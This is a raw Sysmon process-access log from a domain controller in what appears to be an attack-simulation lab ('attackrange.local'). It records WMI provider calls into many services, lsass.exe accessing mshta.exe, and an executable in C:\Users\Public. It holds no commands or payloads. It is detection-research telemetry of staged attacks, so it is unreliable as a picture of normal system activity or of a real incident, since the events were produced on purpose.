16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029012Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029011Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029010Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029009Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029008Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029007Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029006Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029005Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029004Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029003Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.878{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029002Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.878{7901BC46-4985-6008-0B00-00000000A301}856596C:\Windows\system32\lsass.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029001Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.878{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029000Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.878{7901BC46-4985-6008-0B00-00000000A301}856596C:\Windows\system32\lsass.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028999Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.878{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028998Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.878{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028997Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.878{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028996Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.878{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028995Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.878{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028994Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.878{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028993Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.878{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\S